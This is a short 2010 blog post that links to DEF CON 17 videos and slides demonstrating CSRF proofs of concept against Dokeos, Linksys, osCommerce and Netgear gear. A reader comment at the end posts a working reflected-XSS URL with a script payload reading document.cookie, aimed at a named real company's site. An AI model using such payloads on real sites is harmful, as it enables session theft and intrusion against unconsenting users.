Wednesday, January 20, 2010

DEF CON 17 CSRF Videos Remastered

Thanks to Adam Gerstein for reminding me to get off my butt and produce the Def Con 17 CSRF videos in a more streamable format.
Adobe Flash Player required; no, I won't pwn you.
If you'd like to see the whole presentation video, goofy as it may be, it's here.
Be forewarned, it's freaking huge and takes a fat pipe to pull it down in any reasonable amount of time.
The presentation slides are here.

The Dokeos CSRF PoC video is here.

The Linksys CSRF PoC video is here.

The osCommerce CSRF PoC video is here.
Note: Please don't use osCommerce, they still haven't fixed this and probably never will.

BONUS VIDEO (discussed but not shown at Def Con)
The Netgear CSRF PoC video is here (QuickTime and sorta crappy, sorry).

Enjoy.
Cheers.


Please support the Open Security Foundation (OSVDB)

1 comment:

Anonymous said...

FYI, that rxss is still there on ameriprise's site...

http://locator.ameripriseadvisors.com/?zip=%3C&x=15&y=14&page=results&solc_id=19819&vend_cd=ALA&offer_id=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C/SCRIPT%3E

enjoy